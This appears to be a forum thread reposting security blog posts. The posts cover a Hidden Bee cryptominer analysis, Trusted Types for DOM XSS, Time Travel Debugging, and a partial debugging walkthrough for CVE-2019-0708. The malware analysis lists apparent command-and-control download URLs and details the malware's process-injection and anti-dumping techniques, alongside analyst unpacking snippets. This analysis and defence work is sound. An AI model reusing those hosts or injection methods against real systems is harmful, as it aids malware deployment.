    sltp://bbs.favcom.space:1108/setup.bin?id=999&sid=0&sz=a7854b960e59efdaa670520bb9602f87&os=65542&ar=0

    The hash (sz=) is an MD5 generated from VolumeIDs. Then follows (os=), identifying the version of the operating system, and (ar=), the identifier of the architecture, where 0 means 32-bit and 1 means 64-bit.

    The content downloaded from this URL (starting with a magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains the encrypted package (in the !rbx format) and a shellcode that will be used to unpack it. The shellcode is loaded into the current process and then executed.

    load_shellcode-1.png The ‘FEEDFACE’ module contains the shellcode to be loaded

    The shellcode's start function takes three parameters: a pointer to the functions in the previous module (core.sdb), a pointer to the buffer with the encrypted data, and the size of the encrypted data.

    calling_the_shellcode.png The loader calling the shellcode

    Fourth stage: the shellcode decrypting !rbx

    The beginning of the loaded shellcode:

    shellcode_bgn.png

    The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from the core.sdb module, to which it was given a pointer. It makes use of the following functions: malloc, memcpy, memfree, VirtualAlloc.

    calling_via_coresdb.png Example: calling malloc via core.sdb

    Its role is to reveal another part, which comes in an encrypted package starting with the marker !rbx. The decryption function is called right at the beginning:

    decrypt_rbx.png Calling the decrypting function (at Entry Point of the shellcode)

    First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer:

    checking_the_marker.png Checking marker and then checksum

    It is decrypted with the help of the RC4 algorithm, and then decompressed.

    After decryption, the markers at the beginning of the buffer are checked. The expected format must start with the predefined magic DWORDs: 0xCAFEBABE, 0, 0xBABECAFE:

    check_format.png

    The !rbx package format

    The !rbx is also a custom format with a consistent structure.

    copy_afer_rbx_hdr.png
    DWORD magic; // "!rbx"
    DWORD checksum;
    DWORD content_size;
    BYTE rc4_key[16];
    DWORD out_size;
    BYTE content[];
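
    Following this layout, the unpacking can be sketched in Python like so (the checksum verification and the final decompression step are omitted):

      import struct

      def rc4(key, data):
          # Plain RC4: key scheduling followed by the keystream XOR.
          S = list(range(256))
          j = 0
          for i in range(256):
              j = (j + S[i] + key[i % len(key)]) & 0xFF
              S[i], S[j] = S[j], S[i]
          out, i, j = bytearray(), 0, 0
          for b in data:
              i = (i + 1) & 0xFF
              j = (j + S[i]) & 0xFF
              S[i], S[j] = S[j], S[i]
              out.append(b ^ S[(S[i] + S[j]) & 0xFF])
          return bytes(out)

      def unpack_rbx(blob):
          magic, checksum, content_size = struct.unpack_from("<4sII", blob, 0)
          assert magic == b"!rbx"
          rc4_key = blob[12:28]                      # BYTE rc4_key[16]
          content = blob[32:32 + content_size]       # BYTE content[]
          return rc4(rc4_key, content)               # decompression omitted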

    The custom file system (BABECAFE)

    The full decrypted content has a consistent structure, reminiscent of a file system. According to previous reports, earlier versions of Hidden Bee adapted the ROM FS filesystem, adding a few modifications; they called their customized version "Mixed ROM FS". Now it seems that their customization has progressed further: the keywords suggesting ROMFS can no longer be found. The header starts with markers in the form of three DWORDs: { 0xCAFEBABE, 0, 0xBABECAFE }.

    checkibng_babecafe_format.png
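
    Checking for this header in Python is a one-liner:

      import struct

      def is_babecafe(blob):
          # The FS must start with the three magic DWORDs: 0xCAFEBABE, 0, 0xBABECAFE.
          return struct.unpack_from("<3I", blob, 0) == (0xCAFEBABE, 0, 0xBABECAFE)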

    The layout of BABECAFE FS:

    babecafe_fs-1.png

    We notice that it differs at many points from ROM FS, from which it evolved.

    The structure contains the following files:

    /bin/amd64/coredll.bin
    /bin/i386/coredll.bin
    /bin/i386/preload
    /bin/amd64/preload
    /pkg/sputnik.spk
    /installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b)
    /installer/com_x64.dll
    /pkg/plugins.spk

    The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format.

    rsi_package_bgn.png
    Beginning of the !rsi package in the BABECAFE FS

    Each of the spk packages contains another custom filesystem, identified by the keyword SPUTNIK (possibly the extension 'spk' is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution.

    Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36
    Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523.

    Selecting and running modules

    Some executables stored in the filesystem come in two versions: 32- and 64-bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader first chooses /bin/i386/preload (a shellcode) and /bin/i386/coredll.bin (a module in the NS custom format). The names are hardcoded within the loading shellcode:

    loading_modules.png Searching the modules in the custom file system

    After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area. The coredll.bin is copied just after preload. Then, the preload module is called:

    call_preload.png Redirecting execution to preload

    The preload is position-independent, and its execution starts from the beginning of the page.

    to_enter_preload.png Entering ‘preload’

    The only role of this shellcode is to prepare and run coredll.bin. It therefore contains a custom loader for the NS format, which allocates another memory area and loads the NS file there.

    Fifth stage: preload and coredll

    After loading coredll, preload redirects the execution there. 

    coredll_ep.png coredll at its Entry Point

    The coredll patches a function inside NTDLL, KiUserExceptionDispatcher, redirecting one of the inner calls to its own code:

    patched_kiuserdispatch.png A patch inside KiUserExceptionDispatcher

    Depending on which process the coredll was injected into, it can take one of a few paths of execution.

    If it is running for the first time, it will try to inject itself again, this time into rundll32. For the purpose of the injection, it will again unpack the original !rbx package and use the original copy of itself stored there.

    to_unpack_rbx-1.png Entering the unpacking function checking_magic.png Inside the unpacking function: checking the magic “!rbx”

    Then it will choose the modules depending on the bitness of the rundll32:

    create_rundll32_suspended.png

    It selects the pair of modules (preload/coredll.bin) appropriate for the architecture, either from the directory amd64 or from i386:

    choose_modules.png

    If the injection failed, it makes another attempt, this time trying to inject into dllhost:

    try_inject.png

    Each time it uses the same, hardcoded parameter (/Processid: {...}) that is passed to the created process:

    with_processid.png

    The thread context of the target process is modified, and then the thread is resumed, running the injected content:

    injected_to_rundll32.png

    Now, when we look inside the memory of rundll32, we can find the preload and coredll being mapped:

    rundll32_injected_preload.png

    Inside the injected part, the execution follows a similar path: preload loads the coredll and redirects to its Entry Point. But then, another path of execution is taken.

    The parameter passed to the coredll decides which round of execution it is. In the second round, another injection is made, this time into dllhost.exe. Finally, it proceeds to the last round, where the remaining modules are unpacked from the BABECAFE filesystem.

    to_unpack_spk.png Parameter deciding which path to take

    The unpacking function first searches by name for two more modules: sputnik.spk and plugins.spk. Both are in the mysterious !rsi format, which is reminiscent of !rbx but has a slightly different structure.

    find_sputnik_and_plugins.png

    Entering the function unpacking the first !rsi package:

    to_unpack_rsi.png

    The function unpacking the !rsi format is structured similarly to the !rbx unpacking. It also starts from checking the keyword:

    check_rsi_keyword.png Checking “!rsi” keyword

    As mentioned before, both !rsi packages are used to store filesystems marked with the keyword "SPUTNIK". It is another custom filesystem, invented by the Hidden Bee authors, that contains additional modules.

    check_sputnik_keyword.png The “SPUTNIK” keyword is checked after the module is unpacked

    Unpacking the sputnik.spk resulted in getting the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377

    check_sputnik_format.png

    It is worth noting that the unpacked filesystem contains four executables: two pairs, each consisting of an NS and a PE file, in 32- and 64-bit versions. In the currently-analyzed setup, the 32-bit versions are deployed.

    The NS module will be the next to be run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.)

    call_another.png Calling the newly-loaded NS executable

    Sixth stage: mpsi.dll (unpacked from SPUTNIK)

    Entering into the NS module starts another layer of the malware:

    call_ns_ep.png Entry Point of the NS module: the !rsi modules, prepended with their size, are passed

    The analyzed module, converted to PE is available here: 537523ee256824e371d0bc16298b3849

    This module is responsible for loading plugins. It also creates a named pipe through which it will communicate with other modules, and it sets up the commands that are going to be executed on demand.

    This is how the beginning of the main function looks:

    start_main.png

    Like in previous cases, it starts by finishing its own loading (applying relocations and resolving imports). Then, it patches the function in NTDLL. This is a common prolog in many Hidden Bee modules.

    Then, we have another phase of loading elements from the supplied packages. The path that will be taken depends on the runtime arguments. If the function received both !rsi packages, it will start by parsing one of them and retrieving and loading submodules.

    First, the SPUTNIK filesystem must be unpacked from the !rsi package:

    unpack_and_mount_plugins.png

    After being unpacked, it is mounted. The filesystems are mounted internally, in memory: a global structure is filled with pointers to the appropriate elements of the filesystem.

    retrieve_plugins.png

    At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.api, deepfreeze.api, and netscan.api. Those names are appended to the root path of the modules.

    rootpath.png

    Each module is fetched from the mounted filesystem and loaded:

    load_plugin.png Calling the function to load the plugin

    Consecutive modules are loaded one after another in the same executable memory area. After the module is loaded, its header is erased. It is a common technique used in order to make dumping of the payload from the memory more difficult.
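    Because the headers are erased, a module dumped from this memory area will not start with a recognizable magic. A small sketch of how an analyst might flag such dumps; 'MZ' covers a conventional PE, 'NS' is one of the custom magics mentioned in this analysis, and the checked sizes are our own guesses:

    // Flag a dumped region whose format header appears to have been wiped.
    const fs = require('fs');

    const dump = fs.readFileSync(process.argv[2]);
    const magic = dump.slice(0, 2).toString('ascii');
    if (['MZ', 'NS'].includes(magic)) {
        console.log('header present: ' + magic);
    } else if (dump.slice(0, 0x200).every(b => b === 0)) {
        console.log('header appears erased (first 0x200 bytes are zero)');
    } else {
        console.log('unrecognized format');
    }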

    The cloudcompute.api is a plugin that will load the miner. More about the plugins will be explained in the next section of this post.

    Reading its code, we find out that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module will be communicating with others with the help of a named pipe. It will be receiving commands and executing appropriate handlers.

    Initialization of the commands’ parser:

    to_setup_commands.png

    The function setting up the commands: For each name, a handler is registered. (This is probably the Lua dispatcher, first described here.)

    setup_commands-1.png

    When plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case it is inside rundll32):

    plugin_running.png

    It also triggers a firewall alert, which means the malware requested to open some ports (this is triggered by the netscan.api plugin):

    open_ports.png

    We can see that it started listening on one TCP and one UDP port:

    socket.png

    The plugins

    As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.api, deepfreeze.api, and netscan.api. If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. Looking at the filled import table, we find that the addresses resolve to functions from the previous NS module:

    mpsi_imports-1.png

    So we can conclude that the previous element is the mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled in the import tables of the loaded plugins.
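    Conceptually, the custom loader can ignore the destroyed export table because it keeps its own name-to-address map and patches each import slot directly. A toy sketch of that idea; all names and addresses below are hypothetical:

    // Toy model of a custom loader satisfying imports without an export table.
    const mpsiExports = new Map([          // hypothetical name -> address map
        ['PipeWrite', 0x7ff6a0001000n],
        ['FsMount',   0x7ff6a0002000n],
    ]);

    function fillImports(requestedNames) {
        // Each IAT slot receives the resolved address, or the load fails.
        return requestedNames.map(n => {
            if (!mpsiExports.has(n)) throw new Error('unresolved import: ' + n);
            return mpsiExports.get(n);
        });
    }

    console.log(fillImports(['PipeWrite', 'FsMount']));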

    First the cloudcompute.api is run.

    This plugin retrieves from the filesystem a file named “/etc/ccmain.json” that contains the list of URLs:

    next_part_addresses.png

    Those are addresses from which another set of modules is going to be downloaded:

     

    ["sstp://news.onetouchauthentication.online:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.club:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.icu:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.xyz:443/mlf_plug.zip.sig"]

     

    It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in NE format (version converted to PE is available here: 367db629beedf528adaa021bdb7c12de)

    load_ccmain-600x309.png

    This is the component that is injected into msdtc.exe.

    implanted_in_msdtc.png The HiddenBee module mapped into msdtc.exe

    The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C:

    to_download_modules.png

    This is the plugin responsible for downloading and deploying the Mellifera miner, the core component of Hidden Bee.

    Next, the netscan.api loads module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04)

    load_kernelbase.png

    The miner in APT-style

    Hidden Bee is an eclectic malware. Although it is a commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity.

    Appendix

    https://github.com/hasherezade/hidden_bee_tools – helper tools for parsing and converting Hidden Bee custom formats

    https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/

    Articles about the previous version (in Chinese):

    Our first encounter with the Hidden Bee:

    https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/

     

    Sursa: https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/

  19.  

    18 years have passed since Cross-Site Scripting (XSS) has been identified as a web vulnerability class. Since then, numerous efforts have been proposed to detect, fix or mitigate it. We've seen vulnerability scanners, fuzzers, static & dynamic code analyzers, taint tracking engines, linters, and finally XSS filters, WAFs and all various flavours of Content Security Policy.

    Various libraries have been created to minimize or eliminate the risk of XSS: HTML sanitizers, templating libraries, sandboxing solutions - and yet XSS is still one of the most prevalent vulnerabilities plaguing web applications.

    It seems that, while we have a pretty good grasp on how to address stored & reflected XSS, "solving" DOM XSS remains an open question. DOM XSS is caused by the ever-growing complexity of client-side JavaScript code (see script gadgets), but most importantly by the lack of security in DOM API design.

    But perhaps we have a chance this time? Trusted Types is a new browser API that allows a web application to limit its interaction with the DOM, with the goal of obliterating DOM XSS. Based on the battle-tested design that prevents XSS in most of Google's web applications, Trusted Types add a DOM XSS prevention API to the browsers. Trusted Types allow isolating the application components that may potentially introduce DOM XSS into tiny, reviewable pieces, and guarantee that the rest of the code is DOM-XSS free. They can also leverage existing solutions, like autoescaping templating libraries or client-side sanitizers, as building blocks of a secure application.
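    For a flavor of the API, here is a minimal sketch based on the design described above (names follow the spec drafts and polyfill of the time and may differ between versions):

    // A policy is the only place allowed to mint TrustedHTML; the rest of the
    // code can only assign policy-produced values to sinks like innerHTML.
    const userInput = '<img src=x onerror=alert(1)>';
    if (window.trustedTypes) {
        const escapePolicy = trustedTypes.createPolicy('escape', {
            createHTML: s => s.replace(/</g, '&lt;'),
        });
        document.querySelector('#out').innerHTML = escapePolicy.createHTML(userInput);
    }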

    Trusted Types have a working polyfill, an implementation in Chrome and integrate well with existing JS frameworks and libraries. Oddly similar to both XSS filters and CSP, they are also fundamentally different, and in our opinion have a reasonable chance of eliminating DOM XSS - once and for all.

  20. Time travel debugging: It’s a blast! (from the past)

     
    May 29, 2019

    The Microsoft Security Response Center (MSRC) works to assess vulnerabilities that are externally reported to us as quickly as possible, but time can be lost if we have to confirm details of the repro steps or environment with the researcher to reproduce the vulnerability. Microsoft has made our “Time Travel Debugging” (TTD) tool publicly available to make it easy for security researchers to provide full repro, shortening investigations and potentially contributing to higher bounties (see “Report quality definitions for Microsoft’s Bug Bounty programs”). We use it internally, too—it has allowed us to find root cause for complex software issues in half the time it would take with a regular debugger.

    If you’re wondering where you can get the TTD tool and how to use it, this blogpost is for you.

    Understanding time travel debugging

    Whether you call it “Timeless debugging”, “record-replay debugging”, “reverse-debugging”, or “time travel debugging”, it’s the same idea: the ability to record the execution of a program. Once you have this recording, you can navigate forward or backward through it, and you can share it with colleagues. Even better, an execution trace is a deterministic recording; everybody looking at it sees the same behavior at the same time. When developers receive a TTD trace, they do not even need to reproduce the issue; they can simply navigate through the trace file.

    There are usually three key components associated with time travel debugging:

    1. A recorder that you can picture as a video camera,
    2. A trace file that you can picture as the recording file generated by the camera,
    3. A replayer that you can picture as a movie player.

    Good ol’ debuggers

    Debuggers aren’t new, and the process of debugging an issue has not drastically changed for decades. The process typically works like this:

    1. Observing the behavior under a debugger. In this step, you recreate an environment like that of the finder of the bug. It can be as easy as running a simple proof-of-concept program on your machine and observing a bug-check, or it can be as complex as setting up an entire infrastructure with specific software configurations just to be able to exercise the code at fault. And that’s if the bug report is accurate and detailed enough to properly set up the environment.
    2. Understanding why the issue happened. This is where the debugger comes in. What you expect of a debugger regardless of architectures and platforms is to be able to precisely control the execution of your target (stepping-over, stepping-in at various granularity level: instruction, source-code line), setting breakpoints, editing the memory as well as editing the processor context. This basic set of features enables you to get the job done. The cost is usually high though. A lot of reproducing the issue over and over, a lot of stepping-in and a lot of “Oops... I should not have stepped-over, let’s restart”. Wasteful and inefficient.

    Whether you’re the researcher reporting a vulnerability or a member of the team confirming it, Time Travel Debugging can help the investigation to go quickly and with minimal back and forth to confirm details.

    High-level overview

    The technology that Microsoft has developed is called “TTD”, for time travel debugging. Born out of Microsoft Research around 2006 (cf. “Framework for Instruction-level Tracing and Analysis of Program Executions”), it was later improved and productized by Microsoft’s debugging team. The project relies on code emulation to record every event that replay will need to reproduce the exact same execution: the exact same sequence of instructions with the exact same inputs and outputs. The data that the emulator tracks includes memory reads, register values, thread creation, module loads, etc.

    Recording / Replaying

    xttd-img1.png

    The recording software CPU, TTDRecordCPU.dll, is injected into the target process and hijacks the control flow of its threads. The emulator decodes native instructions into an internal custom intermediate language (modeled after simple RISC instructions), caches blocks, and executes them. From then on, it carries the execution of those threads forward and dispatches callbacks whenever an event happens, such as when an instruction has been translated. Those callbacks allow the trace file writer component to collect the information that the software CPU will need to replay the execution from the trace file.

    xttd-img2.png

    The replay software CPU, TTDReplayCPU.dll, shares most of its codebase with the record CPU, except that instead of reading the target memory it loads data directly from the trace file. This allows you to replay the execution of a program with full fidelity without needing to run the program.

    The trace file

    The trace file is a regular file on your file system with the ‘run’ extension. The file uses a custom format and compression to optimize the file size. You can also view this file as a database filled with rich information. To give the debugger fast access to the information it requires, “WinDbg Preview” creates an index file the first time you open a trace file; this usually takes a few minutes. The index is typically about one to two times as large as the original trace file. As an example, tracing ping.exe on my machine generated a trace file of 37MB and an index file of 41MB, covering about 1,973,647 instructions (about 132 bits per instruction). Note that, in this instance, the trace file is so small that its internal structures account for most of the space overhead. A larger execution trace usually contains about 1 to 2 bits per instruction.

    Recording a trace with WinDbg Preview

    Now that you’re familiar with the pieces of TTD, here’s how to use them.

    Get TTD: TTD is currently available on Windows 10 through the “WinDbg Preview” app that you can find in the Microsoft store: https://www.microsoft.com/en-us/p/windbg-preview/9pgjgd53tn86?activetab=pivot:overviewtab.

    xttd-img3.png

    Once you install the application the “Time Travel Debugging - Record a trace” tutorial will walk you through recording your first execution trace.

    Building automations with TTD

    A recent improvement to the Windows debugger is the addition of the debugger data model and the ability to interact with it via JavaScript (as well as C++). The details of the data model are out of scope for this blog, but you can think of it as a way to both consume and expose structured data to the user and debugger extensions. TTD extends the data model by introducing very powerful and unique features available under both the @$cursession.TTD and @$curprocess.TTD nodes.

    xttd-img4.png

    TTD.Calls is a function that allows you to answer questions like “Give me every position where foo!bar has been invoked” or “Is there a call to foo!bar that returned 10 in the trace?”. Better yet, like every collection in the data model, you can query the results with LINQ operators. Here is what a TTD.Calls object looks like:

    
    0:000> dx @$cursession.TTD.Calls("msvcrt!write").First()
    @$cursession.TTD.Calls("msvcrt!write").First()
        EventType        : Call
        ThreadId         : 0x194
        UniqueThreadId   : 0x2
        TimeStart        : 1310:A81 [Time Travel]
        TimeEnd          : 1345:14 [Time Travel]
        Function         : msvcrt!_write
        FunctionAddress  : 0x7ffec9bbfb50
        ReturnAddress    : 0x7ffec9be74a2
        ReturnValue      : 401
        Parameters
    

    The API completely hides away ISA specific details, so you can build queries that are architecture independent.
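    As an example of such a query, here is a hedged sketch in the debugger's JavaScript host, reusing the msvcrt!write call from the listing above (the return value 401 is simply the one visible in that sample output):

    'use strict';
    function initializeScript() {
        return [new host.apiVersionSupport(1, 3)];
    }
    function invokeScript() {
        const logln = p => host.diagnostics.debugLog(p + '\n');
        // LINQ-style operators apply directly to the TTD.Calls collection.
        const hits = host.currentSession.TTD.Calls('msvcrt!write')
                         .Where(c => c.ReturnValue == 401);
        logln('calls returning 401: ' + hits.Count());
        for (const c of hits)
            logln(c.TimeStart + ' -> returned ' + c.ReturnValue);
    }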

    TTD.Calls: Reconstructing stdout

    To demo how powerful and easy it is to leverage these features, we record the execution of “ping.exe 127.0.0.1” and from the recording rebuild the console output.

    Building this in JavaScript is very easy:

    1. Iterate over every call to msvcrt!write ordered by the time position,
    2. Read several bytes (the count is in the third argument) pointed to by the second argument,
    3. Display the accumulated results.
    
    'use strict';
    function initializeScript() {
        return [new host.apiVersionSupport(1, 3)];
    }
    function invokeScript() {
        const logln = p => host.diagnostics.debugLog(p + '\n');
        const CurrentSession = host.currentSession;
        const Memory = host.memory;
        const Bytes = [];
        for(const Call of CurrentSession.TTD.Calls('msvcrt!write').OrderBy(p => p.TimeStart)) {
            Call.TimeStart.SeekTo();
            const [_, Address, Count] = Call.Parameters;
            Bytes.push(...Memory.readMemoryValues(Address, Count, 1));
        }
        logln(Bytes.filter(p => p != 0).map(
            p => String.fromCharCode(p)
        ).join(''));
    }
    

    xttd-img5.png

    TTD.Memory: Finding every thread that touched the LastErrorValue

    TTD.Memory is a powerful API that allows you to query the trace file for certain types (read, write, execute) of memory access over a range of memory. Every resulting object of a memory query looks like the sample below:

    
    0:000> dx @$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First()
    @$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First()
        EventType        : MemoryAccess
        ThreadId         : 0xb10
        UniqueThreadId   : 0x2
        TimeStart        : 215:27 [Time Travel]
        TimeEnd          : 215:27 [Time Travel]
        AccessType       : Write
        IP               : 0x76e6c8be
        Address          : 0x7fffffde068
        Size             : 0x4
        Value            : 0x0
    

    This result identifies the type of memory access, the time stamps for start and finish, the thread accessing the memory, the memory address accessed, the instruction pointer at which the access happened, and what value has been read/written/executed.

    To demonstrate its power, let’s create another script that collects the call-stack every time the application writes to the LastErrorValue in the current thread’s environment block:

    1. Iterate over every memory write access to &@$teb->LastErrorValue,
    2. Travel to the destination, dump the current call-stack,
    3. Display the results.
    
    'use strict';
    function initializeScript() {
        return [new host.apiVersionSupport(1, 3)];
    }
    function invokeScript() {
        const logln = p => host.diagnostics.debugLog(p + '\n');
        const CurrentThread = host.currentThread;
        const CurrentSession = host.currentSession;
        const Teb = CurrentThread.Environment.EnvironmentBlock;
        const LastErrorValueOffset = Teb.targetType.fields.LastErrorValue.offset;
        const LastErrorValueAddress = Teb.address.add(LastErrorValueOffset);
        const Callstacks = new Set();
        for(const Access of CurrentSession.TTD.Memory(
            LastErrorValueAddress, LastErrorValueAddress.add(8), 'w'
        )) {
            Access.TimeStart.SeekTo();
            const Callstack = Array.from(CurrentThread.Stack.Frames);
            Callstacks.add(Callstack);
        }
        for(const Callstack of Callstacks) {
            for(const [Idx, Frame] of Callstack.entries()) {
                logln(Idx + ': ' + Frame);
            }
            logln('----');
        }
    }
    

    xttd-img6.png

    Note that there are more TTD-specific objects you can use to get information related to events that happened in a trace, the lifetime of threads, and so on. All of those are documented on the “Introduction to Time Travel Debugging objects” page.

    
    0:000> dx @$curprocess.TTD.Lifetime
    @$curprocess.TTD.Lifetime                 : [F:0, 1F4B:0]
        MinPosition      : F:0 [Time Travel]
        MaxPosition      : 1F4B:0 [Time Travel]
    0:000> dx @$curprocess.Threads.Select(p => p.TTD.Position)
    @$curprocess.Threads.Select(p => p.TTD.Position)
        [0x194]          : 1E21:104 [Time Travel]
        [0x7e88]         : 717:1 [Time Travel]
        [0x5fa4]         : 723:1 [Time Travel]
        [0x176c]         : B58:1 [Time Travel]
        [0x76a0]         : 1938:1 [Time Travel]
    

    Wrapping up

    Time Travel Debugging is a powerful tool for security software engineers and can also be beneficial for malware analysis, vulnerability hunting, and performance analysis. We hope you found this introduction to TTD useful and encourage you to use it to create execution traces for the security issues you find. The trace files generated by TTD compress very well; we recommend using 7zip (which usually shrinks the file to about 10% of its original size) before uploading a trace to your favorite file storage service.

    Axel Souchet

    Microsoft Security Response Center (MSRC)

    FAQ

    Can I edit memory during replay time?

    No. As the recorder only saves what is needed to replay a particular execution path in your program, it doesn’t save enough information to be able to re-simulate a different execution.

    Why don’t I see the bytes when a file is read?

    The recorder knows only what it has emulated, which means that if another entity (here the NT kernel, but it could also be another process writing into a shared memory section) writes data to memory, there is no way for the emulator to know about it. As a result, if the target program never reads those values back, they will never appear in the trace file. If they are read later, their values will be available at that point, when the emulator fetches the memory again. This is an area the team is planning on improving soon, so watch this space 😊.

    Do I need private symbols or source code?

    You don’t need source code or private symbols to use TTD. The recorder consumes native code and doesn’t need anything extra to do its job. If private symbols and source code are available, the debugger will consume them and provide the same experience as when debugging with source and symbols.

    Can I record kernel-mode execution?

    TTD is for user-mode execution only.

    Does the recorder support self-modifying code?

    Yes, it does!

    Are there any known incompatibilities?

    There are some and you can read about them in “Things to look out for”.

    Do I need WinDbg Preview to record traces?

    Yes. As of today, the TTD recorder is shipping only as part of “WinDbg Preview” which is only downloadable from the Microsoft Store.

    References

    Time travel debugging

    1. Time Travel Debugging - Overview - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview
    2. Time Travel Debugging: Root Causing Bugs in Commercial Scale Software -https://www.youtube.com/watch?v=l1YJTg_A914
    3. Defrag Tools #185 - Time Travel Debugging – Introduction - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-185-Time-Travel-Debugging-Introduction
    4. Defrag Tools #186 - Time Travel Debugging – Advanced - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-186-Time-Travel-Debugging-Advanced
    5. Time Travel Debugging and Queries – https://github.com/Microsoft/WinDbg-Samples/blob/master/TTDQueries/tutorial-instructions.md
    6. Framework for Instruction-level Tracing and Analysis of Program Executions - https://www.usenix.org/legacy/events/vee06/full_papers/p154-bhansali.pdf
    7. VulnScan – Automated Triage and Root Cause Analysis of Memory Corruption Issues - https://blogs.technet.microsoft.com/srd/2017/10/03/vulnscan-automated-triage-and-root-cause-analysis-of-memory-corruption-issues/
    8. What’s new in WinDbg Preview - https://mybuild.techcommunity.microsoft.com/sessions/77266

    Javascript / WinDbg / Data model

    1. WinDbg Javascript examples - https://github.com/Microsoft/WinDbg-Samples
    2. Introduction to Time Travel Debugging objects - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-object-model
    3. WinDbg Preview - Data Model - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-data-model-preview

     

    Sursa: https://blogs.technet.microsoft.com/srd/2019/05/29/time-travel-debugging-its-a-blast-from-the-past/

  21. A Debugging Primer with CVE-2019–0708

    May 29
     

    By: @straight_blast ; straightblast426@gmail.com

     

    The purpose of this post is to share how one would use a debugger to identify the relevant code path that can trigger the crash. I hope this post will be educational to people who are excited to learn how to use a debugger for vulnerability analysis.

    This post will not go into the details of RDP communication basics and MS_T120. Interested readers should refer to the following blogs, which sum up the need-to-know basics:

    Furthermore, no PoC code will be provided in this post, as the purpose is to show vulnerability analysis with a debugger.

    The target machine (debuggee) will be a Windows 7 x64 and the debugger machine will be a Windows 10 x64. Both the debugger and debuggee will run within VirtualBox.

    Setting up the kernel debugging environment with VirtualBox

    1. On the target machine, run cmd.exe with administrative privilege. Use the bcdedit command to enable kernel debugging.
    bcdedit /set {current} debug yes
    bcdedit /set {current} debugtype serial
    bcdedit /set {current} debugport 1
    bcdedit /set {current} baudrate 115200
    bcdedit /set {current} description "Windows 7 with kernel debug via COM"

    When you type bcdedit again, something similar to the following screenshot should display:

    1*AIzE7lB100OxAA5TFroE5Q.png

    2. Shutdown the target machine (debuggee) and right click on the target image in the VirtualBox Manager. Select “Settings” and then “Serial Ports”. Copy the settings as illustrated in the following image and click “OK”:

    1*wt0WogyFttm4uFebtkmpYg.png

    3. Right click on the image that will host the debugger, and go to the “Serial Ports” setting and copy the settings as shown and click “OK”:

    1*Kb4_P4v7o3yA5FOBwg_04g.png

    4. Keep the debuggee VM shutdown, and boot up the debugger VM. On the debugger VM, download and install WinDBG. I will be using the WinDBG Preview edition.

    5. Once the debugger is installed, select “Attach to kernel”, set the “Baud Rate” to “115200” and “Port” to “com1”. Click on “initial break” as well.

    1*IIbwGiQeqoVBaptY15LWJQ.png

    Click “OK” and the debugger is now ready to attach to the debuggee.

    1*OMaH8p1OtrHZUjkjmpcAqg.png

    6. Fire up the target “debuggee” machine, and the following prompt will be displayed. Select the one with “debugger enabled” and proceed.

    1*z89v_TrIHlATFcqteH-39Q.png

    On the debugger end, WinDBG will have established a connection with the debuggee. It will take a few manual entries of “g” in the debugger command prompt to get the debuggee completely loaded. Also, because the debugging traffic is handled over the COM port, the initial startup will take a bit of time.

    1*IzFQCRqw7LOMSo_4ET8mCw.png

    7. Once the debuggee is loaded, fire up “cmd.exe” and type “netstat -ano”. Locate the PID that runs port 3389, as follows:

    1*GeNibmgftlPi-pC-AWRajQ.png

    8. Go back to the debugger and click on “Home” -> “Break” to enable the debugger command prompt and type:

    !process 0 0 svchost.exe

    This will list a bunch of processes associated with svchost.exe. We’re interested in the process that has PID 1216 (0x4C0).

    1*hnlWU3RncscxHJwGxHVmfw.png

    9. We will now switch into the context of svchost.exe that runs RDP. In the debugger command prompt, type:

    .process /i /p fffffa80082b72a0
    1*z75Swdx6Jr_cGj0NJnGR3Q.png

    After the context switch, pause the debugger and run the “.reload” command to reload all the symbols that the process will use.

    Identifying the relevant code path

    Without repeating too much of the public information: the patch changed code in IcaBindVirtualChannels. We know that if IcaFindChannelByName finds the string “MS_T120”, it calls IcaBindChannel like so:

    _IcaBindChannel(ChannelControlStructure*, 5, index, dontcare) 

    The following screenshots depicts the relevant unpatched code in IcaBindVirtualChannels:

    1*CDCdZolftT4TP-yRanJO6g.png

    We’re going to set two breakpoints.

    One will be on _IcaBindChannel, where the channel control structure is stored into the channel pointer table. The index at which the channel control structure is stored is based on the position where the virtual channel name is declared within the clientNetworkData of the MCS Initial Connect and GCC Create packet.

    1*rHcNi3I9cnk6Tym-nHTPiA.png

